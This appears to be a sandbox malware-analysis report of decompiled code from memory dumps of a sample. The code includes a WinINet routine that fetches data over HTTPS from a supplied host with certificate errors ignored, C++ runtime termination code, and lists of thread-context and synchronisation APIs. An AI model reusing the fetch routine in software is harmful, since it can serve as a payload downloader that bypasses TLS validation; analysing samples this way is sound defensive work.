                                                                                                                                                                                                                                                                                                        				void _v296;
                                                                                                                                                                                                                                                                                                        				void* _v300;
                                                                                                                                                                                                                                                                                                        				long _v304;
                                                                                                                                                                                                                                                                                                        				long _v308;
                                                                                                                                                                                                                                                                                                        				char* _t54;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                                                        					_t54 =  *0x400e004; // 0x400c398
                                                                                                                                                                                                                                                                                                        					_v12 = InternetOpenA(_t54, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v16 = InternetConnectA(_v12, _a4, 0x1bb, 0x400c3d2, 0x400c3d1, 3, 0, 0);
                                                                                                                                                                                                                                                                                                        						if(_v16 != 0) {
                                                                                                                                                                                                                                                                                                        							_v20 = HttpOpenRequestA(_v16, "GET", "/", "1.1", 0, 0, 0x80800000, 0);
                                                                                                                                                                                                                                                                                                        							if(_v20 != 0) {
                                                                                                                                                                                                                                                                                                        								wsprintfA( &_v292, "https://%s", _a4);
                                                                                                                                                                                                                                                                                                        								_v28 = "Accept: */*";
                                                                                                                                                                                                                                                                                                        								_v24 = 4;
                                                                                                                                                                                                                                                                                                        								InternetQueryOptionA(_v20, 0x1f,  &_v296,  &_v24);
                                                                                                                                                                                                                                                                                                        								_v296 = _v296 | 0x0000b180;
                                                                                                                                                                                                                                                                                                        								InternetSetOptionA(_v20, 0x1f,  &_v296, 4);
                                                                                                                                                                                                                                                                                                        								if(HttpSendRequestA(_v20, _v28, lstrlenA(_v28), 0, 0) == 0) {
                                                                                                                                                                                                                                                                                                        									_v308 = GetLastError();
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_v300 = 0;
                                                                                                                                                                                                                                                                                                        									while(_v300 < _a12) {
                                                                                                                                                                                                                                                                                                        										_v304 = 0;
                                                                                                                                                                                                                                                                                                        										InternetReadFile(_v20, _a8 + _v300, _a12 - _v300,  &_v304);
                                                                                                                                                                                                                                                                                                        										if(_v304 != 0) {
                                                                                                                                                                                                                                                                                                        											_v300 = _v300 + _v304;
                                                                                                                                                                                                                                                                                                        											 *(_a8 + _v300) = 0;
                                                                                                                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										break;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									_v8 = _v300;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								InternetCloseHandle(_v20);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						InternetCloseHandle(_v12);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                                                                                                        0x04002909
                                                                                                                                                                                                                                                                                                        0x04002914
                                                                                                                                                                                                                                                                                                        0x04002936
                                                                                                                                                                                                                                                                                                        0x04002942
                                                                                                                                                                                                                                                                                                        0x04002949
                                                                                                                                                                                                                                                                                                        0x04002972
                                                                                                                                                                                                                                                                                                        0x04002979
                                                                                                                                                                                                                                                                                                        0x040029a3
                                                                                                                                                                                                                                                                                                        0x040029aa
                                                                                                                                                                                                                                                                                                        0x040029c0
                                                                                                                                                                                                                                                                                                        0x040029c9
                                                                                                                                                                                                                                                                                                        0x040029d0
                                                                                                                                                                                                                                                                                                        0x040029e8
                                                                                                                                                                                                                                                                                                        0x040029f9
                                                                                                                                                                                                                                                                                                        0x04002a0e
                                                                                                                                                                                                                                                                                                        0x04002a33
                                                                                                                                                                                                                                                                                                        0x04002ab5
                                                                                                                                                                                                                                                                                                        0x04002a35
                                                                                                                                                                                                                                                                                                        0x04002a35
                                                                                                                                                                                                                                                                                                        0x04002a3f
                                                                                                                                                                                                                                                                                                        0x04002a4a
                                                                                                                                                                                                                                                                                                        0x04002a73
                                                                                                                                                                                                                                                                                                        0x04002a80
                                                                                                                                                                                                                                                                                                        0x04002a90
                                                                                                                                                                                                                                                                                                        0x04002a9f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04002a82
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04002a80
                                                                                                                                                                                                                                                                                                        0x04002aaa
                                                                                                                                                                                                                                                                                                        0x04002aaa
                                                                                                                                                                                                                                                                                                        0x04002acb
                                                                                                                                                                                                                                                                                                        0x04002acb
                                                                                                                                                                                                                                                                                                        0x04002ad5
                                                                                                                                                                                                                                                                                                        0x04002ad5
                                                                                                                                                                                                                                                                                                        0x04002adf
                                                                                                                                                                                                                                                                                                        0x04002adf
                                                                                                                                                                                                                                                                                                        0x04002949
                                                                                                                                                                                                                                                                                                        0x04002aeb

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(0400C398,00000001,00000000,00000000,00000000), ref: 0400293C
                                                                                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,00000000,000001BB,0400C3D2,0400C3D1,00000003,00000000,00000000), ref: 0400296C
                                                                                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,GET,0400C3D8,1.1,00000000,00000000,80800000,00000000), ref: 0400299D
                                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 040029C0
                                                                                                                                                                                                                                                                                                        • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 040029E8
                                                                                                                                                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002A0E
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(0400C3EC,00000000,00000000), ref: 04002A1C
                                                                                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,0400C3EC,00000000), ref: 04002A2B
                                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 04002A73
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 04002AAF
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 04002ACB
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 04002AD5
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 04002ADF
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                                                                        • String ID: 1.1$GET$https://%s
                                                                                                                                                                                                                                                                                                        • API String ID: 2082764430-1670984264
                                                                                                                                                                                                                                                                                                        • Opcode ID: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6d54c3b05ff69590bd14da6a4fff8ed2da31e3bdf774b399ca20979b5291bdcc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02510C71944218AFEB24CF94DC89BEEB7B4EB49700F108598F605B62C0C7B8AE94CF54
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 22%
                                                                                                                                                                                                                                                                                                        			E00417503() {
                                                                                                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                                                                                                                        				char** _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                                                                                                                                                        				char* _v48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                                                                                                        				char _v76;
                                                                                                                                                                                                                                                                                                        				char _v80;
                                                                                                                                                                                                                                                                                                        				char* _v84;
                                                                                                                                                                                                                                                                                                        				char* _v88;
                                                                                                                                                                                                                                                                                                        				char* _v96;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                                                                                                                                                        				char _v104;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t58;
                                                                                                                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                                                                                                                        				char* _t81;
                                                                                                                                                                                                                                                                                                        				char* _t92;
                                                                                                                                                                                                                                                                                                        				char* _t94;
                                                                                                                                                                                                                                                                                                        				void* _t102;
                                                                                                                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t107;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t109;
                                                                                                                                                                                                                                                                                                        				void* _t112;
                                                                                                                                                                                                                                                                                                        				void* _t113;
                                                                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                                                                                                                        				char** _t116;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				asm("adc al, 0x42");
                                                                                                                                                                                                                                                                                                        				es = _t114;
                                                                                                                                                                                                                                                                                                        				 *_t58 =  *_t58 + _t58;
                                                                                                                                                                                                                                                                                                        				_t116 = _t115 - 0x68;
                                                                                                                                                                                                                                                                                                        				_v48 =  &_v12;
                                                                                                                                                                                                                                                                                                        				 *_t116 =  &_v80;
                                                                                                                                                                                                                                                                                                        				_v56 = E00418AA0;
                                                                                                                                                                                                                                                                                                        				_v52 = 0x4191dc;
                                                                                                                                                                                                                                                                                                        				_v44 = E00417690;
                                                                                                                                                                                                                                                                                                        				_v40 = _t116;
                                                                                                                                                                                                                                                                                                        				E0040E1A0(_t103 + _t103, _t107, _t114);
                                                                                                                                                                                                                                                                                                        				if( *0x41ea6c != 0) {
                                                                                                                                                                                                                                                                                                        					_v100 = 0x1d;
                                                                                                                                                                                                                                                                                                        					_v104 = 1;
                                                                                                                                                                                                                                                                                                        					 *_t116 = "terminate called recursively\n";
                                                                                                                                                                                                                                                                                                        					_v96 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        					_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        					fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        					abort();
                                                                                                                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                                                                                                                        					 *_t116 = _v88;
                                                                                                                                                                                                                                                                                                        					free(??);
                                                                                                                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                                                                                                                        					_v76 = 1;
                                                                                                                                                                                                                                                                                                        					E004189C0();
                                                                                                                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                                                                                                                        					 *_t116 = _v88;
                                                                                                                                                                                                                                                                                                        					fputs(??, ??);
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					_v100 = 2;
                                                                                                                                                                                                                                                                                                        					_v104 = 1;
                                                                                                                                                                                                                                                                                                        					 *_t116 = "\'\n";
                                                                                                                                                                                                                                                                                                        					_v96 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        					_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        					fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        					if(_v16 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				 *0x41ea6c = 1;
                                                                                                                                                                                                                                                                                                        				_t71 = E00418390();
                                                                                                                                                                                                                                                                                                        				if(_t71 == 0) {
                                                                                                                                                                                                                                                                                                        					_v100 = 0x2d;
                                                                                                                                                                                                                                                                                                        					_v104 = 1;
                                                                                                                                                                                                                                                                                                        					 *_t116 = "terminate called without an active exception\n";
                                                                                                                                                                                                                                                                                                        					_v96 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        					_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        					fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                                                                                                                        						_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        						abort();
                                                                                                                                                                                                                                                                                                        						E004183F0(_t102, _t112, _t113, _t114);
                                                                                                                                                                                                                                                                                                        						_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        						 *_t116 = _v88;
                                                                                                                                                                                                                                                                                                        						E0040E810();
                                                                                                                                                                                                                                                                                                        						_t107 = _t107 - 1;
                                                                                                                                                                                                                                                                                                        						 *_t116 = _v88;
                                                                                                                                                                                                                                                                                                        						if(_t107 != 0) {
                                                                                                                                                                                                                                                                                                        							E00418140(_t102, _t112, _t113, _t114);
                                                                                                                                                                                                                                                                                                        							_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        							E004183F0(_t102, _t112, _t113, _t114);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t81 =  *((intOrPtr*)( *((intOrPtr*)(E00418140(_t102, _t112, _t113, _t114))) + 8))();
                                                                                                                                                                                                                                                                                                        							_t109 = __imp___iob;
                                                                                                                                                                                                                                                                                                        							_v100 = 0xb;
                                                                                                                                                                                                                                                                                                        							_v104 = 1;
                                                                                                                                                                                                                                                                                                        							 *_t116 = "  what():  ";
                                                                                                                                                                                                                                                                                                        							_v76 = 2;
                                                                                                                                                                                                                                                                                                        							_v88 = _t81;
                                                                                                                                                                                                                                                                                                        							_t51 = _t109 + 0x40; // 0x76664640
                                                                                                                                                                                                                                                                                                        							_v96 = _t51;
                                                                                                                                                                                                                                                                                                        							fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        							_t107 = __imp___iob;
                                                                                                                                                                                                                                                                                                        							_t53 = _t107 + 0x40; // 0x76664640
                                                                                                                                                                                                                                                                                                        							_v104 = _t53;
                                                                                                                                                                                                                                                                                                        							 *_t116 = _v88;
                                                                                                                                                                                                                                                                                                        							fputs(??, ??);
                                                                                                                                                                                                                                                                                                        							 *_t116 = 0xa;
                                                                                                                                                                                                                                                                                                        							_v104 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        							fputc(??, ??);
                                                                                                                                                                                                                                                                                                        							E004183F0(_t102, _t112, _t113, _t114);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v100 = 0;
                                                                                                                                                                                                                                                                                                        				_v104 = 0;
                                                                                                                                                                                                                                                                                                        				_t92 =  *((intOrPtr*)(_t71 + 4)) + (0 |  *((char*)( *((intOrPtr*)(_t71 + 4)))) == 0x0000002a);
                                                                                                                                                                                                                                                                                                        				_v84 = _t92;
                                                                                                                                                                                                                                                                                                        				 *_t116 = _t92;
                                                                                                                                                                                                                                                                                                        				_v96 =  &_v16;
                                                                                                                                                                                                                                                                                                        				_v16 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        				_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        				_t94 = E0040C8A0();
                                                                                                                                                                                                                                                                                                        				_v100 = 0x30;
                                                                                                                                                                                                                                                                                                        				_v104 = 1;
                                                                                                                                                                                                                                                                                                        				 *_t116 = "terminate called after throwing an instance of \'";
                                                                                                                                                                                                                                                                                                        				_v88 = _t94;
                                                                                                                                                                                                                                                                                                        				_v96 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        				fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        				_v104 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        				if(_v16 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        				 *_t116 = _v84;
                                                                                                                                                                                                                                                                                                        				fputs(??, ??);
                                                                                                                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                                                                                                                        			}































                                                                                                                                                                                                                                                                                                        0x00417503
                                                                                                                                                                                                                                                                                                        0x00417508
                                                                                                                                                                                                                                                                                                        0x00417509
                                                                                                                                                                                                                                                                                                        0x00417511
                                                                                                                                                                                                                                                                                                        0x00417518
                                                                                                                                                                                                                                                                                                        0x00417520
                                                                                                                                                                                                                                                                                                        0x00417523
                                                                                                                                                                                                                                                                                                        0x0041752b
                                                                                                                                                                                                                                                                                                        0x00417533
                                                                                                                                                                                                                                                                                                        0x0041753b
                                                                                                                                                                                                                                                                                                        0x0041753f
                                                                                                                                                                                                                                                                                                        0x0041754b
                                                                                                                                                                                                                                                                                                        0x00417652
                                                                                                                                                                                                                                                                                                        0x0041765a
                                                                                                                                                                                                                                                                                                        0x00417662
                                                                                                                                                                                                                                                                                                        0x0041766c
                                                                                                                                                                                                                                                                                                        0x00417670
                                                                                                                                                                                                                                                                                                        0x00417678
                                                                                                                                                                                                                                                                                                        0x0041767d
                                                                                                                                                                                                                                                                                                        0x00417682
                                                                                                                                                                                                                                                                                                        0x00417686
                                                                                                                                                                                                                                                                                                        0x00417689
                                                                                                                                                                                                                                                                                                        0x00417632
                                                                                                                                                                                                                                                                                                        0x00417632
                                                                                                                                                                                                                                                                                                        0x0041763a
                                                                                                                                                                                                                                                                                                        0x0041763f
                                                                                                                                                                                                                                                                                                        0x00417643
                                                                                                                                                                                                                                                                                                        0x00417646
                                                                                                                                                                                                                                                                                                        0x004175fb
                                                                                                                                                                                                                                                                                                        0x00417600
                                                                                                                                                                                                                                                                                                        0x00417608
                                                                                                                                                                                                                                                                                                        0x00417610
                                                                                                                                                                                                                                                                                                        0x0041761a
                                                                                                                                                                                                                                                                                                        0x0041761e
                                                                                                                                                                                                                                                                                                        0x00417626
                                                                                                                                                                                                                                                                                                        0x00417630
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00417630
                                                                                                                                                                                                                                                                                                        0x00417551
                                                                                                                                                                                                                                                                                                        0x00417558
                                                                                                                                                                                                                                                                                                        0x0041755f
                                                                                                                                                                                                                                                                                                        0x004176b0
                                                                                                                                                                                                                                                                                                        0x004176b8
                                                                                                                                                                                                                                                                                                        0x004176c0
                                                                                                                                                                                                                                                                                                        0x004176ca
                                                                                                                                                                                                                                                                                                        0x004176ce
                                                                                                                                                                                                                                                                                                        0x004176d6
                                                                                                                                                                                                                                                                                                        0x004176db
                                                                                                                                                                                                                                                                                                        0x004176db
                                                                                                                                                                                                                                                                                                        0x004176e3
                                                                                                                                                                                                                                                                                                        0x004176e8
                                                                                                                                                                                                                                                                                                        0x004176f1
                                                                                                                                                                                                                                                                                                        0x004176f9
                                                                                                                                                                                                                                                                                                        0x004176fc
                                                                                                                                                                                                                                                                                                        0x00417705
                                                                                                                                                                                                                                                                                                        0x00417708
                                                                                                                                                                                                                                                                                                        0x0041770b
                                                                                                                                                                                                                                                                                                        0x00417790
                                                                                                                                                                                                                                                                                                        0x00417795
                                                                                                                                                                                                                                                                                                        0x0041779d
                                                                                                                                                                                                                                                                                                        0x0041770d
                                                                                                                                                                                                                                                                                                        0x00417716
                                                                                                                                                                                                                                                                                                        0x00417719
                                                                                                                                                                                                                                                                                                        0x0041771f
                                                                                                                                                                                                                                                                                                        0x00417727
                                                                                                                                                                                                                                                                                                        0x0041772f
                                                                                                                                                                                                                                                                                                        0x00417736
                                                                                                                                                                                                                                                                                                        0x0041773e
                                                                                                                                                                                                                                                                                                        0x00417742
                                                                                                                                                                                                                                                                                                        0x00417745
                                                                                                                                                                                                                                                                                                        0x00417749
                                                                                                                                                                                                                                                                                                        0x0041774e
                                                                                                                                                                                                                                                                                                        0x00417754
                                                                                                                                                                                                                                                                                                        0x00417757
                                                                                                                                                                                                                                                                                                        0x0041775f
                                                                                                                                                                                                                                                                                                        0x00417762
                                                                                                                                                                                                                                                                                                        0x0041776c
                                                                                                                                                                                                                                                                                                        0x00417776
                                                                                                                                                                                                                                                                                                        0x0041777a
                                                                                                                                                                                                                                                                                                        0x0041777f
                                                                                                                                                                                                                                                                                                        0x0041777f
                                                                                                                                                                                                                                                                                                        0x0041770b
                                                                                                                                                                                                                                                                                                        0x004176db
                                                                                                                                                                                                                                                                                                        0x0041756d
                                                                                                                                                                                                                                                                                                        0x00417575
                                                                                                                                                                                                                                                                                                        0x00417580
                                                                                                                                                                                                                                                                                                        0x00417584
                                                                                                                                                                                                                                                                                                        0x0041758c
                                                                                                                                                                                                                                                                                                        0x0041758f
                                                                                                                                                                                                                                                                                                        0x00417593
                                                                                                                                                                                                                                                                                                        0x0041759b
                                                                                                                                                                                                                                                                                                        0x004175a3
                                                                                                                                                                                                                                                                                                        0x004175a8
                                                                                                                                                                                                                                                                                                        0x004175b0
                                                                                                                                                                                                                                                                                                        0x004175b8
                                                                                                                                                                                                                                                                                                        0x004175bf
                                                                                                                                                                                                                                                                                                        0x004175cb
                                                                                                                                                                                                                                                                                                        0x004175cf
                                                                                                                                                                                                                                                                                                        0x004175e1
                                                                                                                                                                                                                                                                                                        0x004175e5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004175eb
                                                                                                                                                                                                                                                                                                        0x004175f3
                                                                                                                                                                                                                                                                                                        0x004175f6
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: fwrite$fputs$abort$fputcfree
                                                                                                                                                                                                                                                                                                        • String ID: -
                                                                                                                                                                                                                                                                                                        • API String ID: 4137898067-2547889144
                                                                                                                                                                                                                                                                                                        • Opcode ID: 966f110e3c9d267f337fade52bea464849e19c7eb2c2cc53f5eb6382d29f39a2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7c812a2032c8a6cafb97bb0affd1969c62a9733217d5893787fd2abbdd02fbd7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 966f110e3c9d267f337fade52bea464849e19c7eb2c2cc53f5eb6382d29f39a2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9551F8B15083418FD310EF2AC54524ABBE0BF84328F448E2EE4E89B391D77D94858F8B
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetHandleInformation.KERNEL32 ref: 00412432
                                                                                                                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32 ref: 00412492
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32 ref: 004124A5
                                                                                                                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32 ref: 004124F7
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32 ref: 0041250A
                                                                                                                                                                                                                                                                                                        • SuspendThread.KERNEL32 ref: 00412560
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32 ref: 00412575
                                                                                                                                                                                                                                                                                                        • GetThreadContext.KERNEL32 ref: 00412592
                                                                                                                                                                                                                                                                                                        • SetThreadContext.KERNEL32(00000000,00000000), ref: 004125AE
                                                                                                                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32(00000000), ref: 004125D7
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 004125E8
                                                                                                                                                                                                                                                                                                        • ResumeThread.KERNEL32(00000000), ref: 004125FD
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Thread$EventIncrementInterlocked$Context$HandleInformationObjectResumeSingleSuspendWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2723890135-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d441bca5eadad69311df4c4c38cd50fc579d132488665014020032ead98f36e8
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8a0950f165c45e38fbf2d56c6a54e5c88b37052457152439e3475d81f3650815
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d441bca5eadad69311df4c4c38cd50fc579d132488665014020032ead98f36e8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A16180B06042009FCB10EF74DA886AABFF4EF04350F51496EEC95DB245D7B8D891CB6A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • calloc.MSVCRT ref: 004160BA
                                                                                                                                                                                                                                                                                                        • CreateSemaphoreA.KERNEL32 ref: 0041610E
                                                                                                                                                                                                                                                                                                        • CreateSemaphoreA.KERNEL32 ref: 00416135
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32 ref: 00416154
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32 ref: 0041615F
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32 ref: 0041616A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
